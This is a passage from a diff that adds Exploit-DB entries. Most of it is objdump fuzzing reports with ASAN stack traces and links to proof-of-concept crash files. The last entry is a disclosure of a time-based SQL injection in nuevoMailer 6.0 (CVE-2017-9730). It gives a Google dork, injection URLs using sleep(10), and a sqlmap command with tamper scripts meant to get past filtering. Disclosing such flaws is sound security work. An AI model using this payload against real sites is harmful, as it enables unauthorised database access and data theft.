https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395) + in disassemble_data at binutils/objdump.c:2445 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445) + in dump_bfd at binutils/objdump.c:3547 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547) + in display_file at binutils/objdump.c:3714 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714) + in main at binutils/objdump.c:4016 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016) + +Input: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.min +Output: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.txt + +Error in "decode_pseudodbg_assert_0": global-buffer-overflow + in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4596 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4596) + in _print_insn_bfin at opcodes/bfin-dis.c:4760 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760) + in print_insn_bfin at opcodes/bfin-dis.c:4778 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778) + in disassemble_bytes at binutils/objdump.c:1864 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864) + in disassemble_section at binutils/objdump.c:2309 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309) + in bfd_map_over_sections at bfd/section.c:1395 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395) + in disassemble_data at binutils/objdump.c:2445 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445) + in dump_bfd at binutils/objdump.c:3547 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547) + in display_file at binutils/objdump.c:3714 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714) + in main at binutils/objdump.c:4016 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016) + +Additional Information: +The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42201.zip diff --git a/platforms/linux/dos/42202.txt b/platforms/linux/dos/42202.txt new file mode 100755 index 000000000..2c5429076 --- /dev/null +++ b/platforms/linux/dos/42202.txt @@ -0,0 +1,37 @@ +Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21582 + +I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer. + +Please find attached the minimized file causing the issue ("Input") and the +ASAN report log ("Output"). Below is the reduced stacktrace with links to the +corresponding source lines on a GitHub mirror. + +The command I used was `objdump -D `. + +Let me know if there is any additional information I can provide. + +-- + +Input: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.min +Output: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.txt + +Error in "ieee_object_p": stack-buffer-overflow + in ieee_object_p at bfd/ieee.c:1985 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1985) + in bfd_check_format_matches at bfd/format.c:311 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311) + in display_object_bfd at binutils/objdump.c:3602 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602) + in display_any_bfd at binutils/objdump.c:3693 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693) + in display_file at binutils/objdump.c:3714 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714) + in main at binutils/objdump.c:4016 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016) + +Additional Information: +The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42202.zip diff --git a/platforms/linux/dos/42203.txt b/platforms/linux/dos/42203.txt new file mode 100755 index 000000000..be94b16c8 --- /dev/null +++ b/platforms/linux/dos/42203.txt @@ -0,0 +1,43 @@ +Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21576 + +I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer. + +Please find attached the minimized file causing the issue ("Input") and the +ASAN report log ("Output"). Below is the reduced stacktrace with links to the +corresponding source lines on a GitHub mirror. + +The command I used was `objdump -D `. + +Let me know if there is any additional information I can provide. + +-- + +Input: 2a13a720199253614962e0bb4402d98c.9149a6478708ae7cb458345e7cbc9354.min +Output: 2a13a720199253614962e0bb4402d98c.9149a6478708ae7cb458345e7cbc9354.txt + +Error in "print_insn_score16": global-buffer-overflow + in print_insn_score16 at opcodes/score7-dis.c:723 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/score7-dis.c#L723) + in s7_print_insn at opcodes/score7-dis.c:954 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/score7-dis.c#L954) + in disassemble_bytes at binutils/objdump.c:1864 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864) + in disassemble_section at binutils/objdump.c:2309 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309) + in bfd_map_over_sections at bfd/section.c:1395 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395) + in disassemble_data at binutils/objdump.c:2445 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445) + in dump_bfd at binutils/objdump.c:3547 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547) + in display_file at binutils/objdump.c:3714 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714) + in main at binutils/objdump.c:4016 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016) + +Additional Information: +The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42203.zip diff --git a/platforms/linux/dos/42204.txt b/platforms/linux/dos/42204.txt new file mode 100755 index 000000000..cac284edb --- /dev/null +++ b/platforms/linux/dos/42204.txt @@ -0,0 +1,44 @@ +Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21595 + +I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer. + +Please find attached the minimized file causing the issue ("Input") and the ASAN report log ("Output"). Below is the reduced stacktrace with links to the corresponding source lines on a GitHub mirror. + +The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`. + +Let me know if there is any additional information I can provide. + +-- + +Input: 3ade4a4333249762a9df82c47f3c111a.65dbcbffa0f6467be847e1372688623b.min +Output: 3ade4a4333249762a9df82c47f3c111a.65dbcbffa0f6467be847e1372688623b.txt + +Error in "aarch64_ext_ldst_reglist": global-buffer-overflow + in aarch64_ext_ldst_reglist at opcodes/aarch64-dis.c:412 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L412) + in aarch64_opcode_decode at opcodes/aarch64-dis.c:2739 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2739) + in aarch64_decode_insn at opcodes/aarch64-dis.c:2831 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2831) + in print_insn_aarch64_word at opcodes/aarch64-dis.c:2973 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2973) + in print_insn_aarch64 at opcodes/aarch64-dis.c:3209 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L3209) + in disassemble_bytes at binutils/objdump.c:1864 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864) + in disassemble_section at binutils/objdump.c:2309 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309) + in bfd_map_over_sections at bfd/section.c:1395 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395) + in disassemble_data at binutils/objdump.c:2445 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445) + in dump_bfd at binutils/objdump.c:3547 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547) + in display_file at binutils/objdump.c:3714 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714) + in main at binutils/objdump.c:4016 + (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016) + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42204.zip diff --git a/platforms/php/webapps/42193.txt b/platforms/php/webapps/42193.txt new file mode 100755 index 000000000..d62b9d915 --- /dev/null +++ b/platforms/php/webapps/42193.txt @@ -0,0 +1,27 @@ +# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection +# Exploit Author: ALEH BOITSAU +# Google Dork: inurl:/inc/rdr.php? +# Date: 2017-06-09 +# Vendor Homepage: https://www.nuevomailer.com/ +# Version: 6.0 and earlier +# Tested on: Linux +# CVE: CVE-2017-9730 + +Description: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier +allows remote attackers to execute arbitrary SQL commands via the "r" parameter. + +PoC: + +https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ] + +https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+ + +sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between  --hostname --technique=T -v 3 --random-agent --time-sec=4 + +NB: "equaltolike" and "between" arsenal to defeat filtering! Data retrieval process may take more than usual time. + +Disclosure Timeline: +2017-06-09: Vendor has been notified +2017-06-09: Vendor responded with intention to fix the vulnerability +2017-06-16: CVE number acquired +2017-06-16: Public disclosure \ No newline at end of file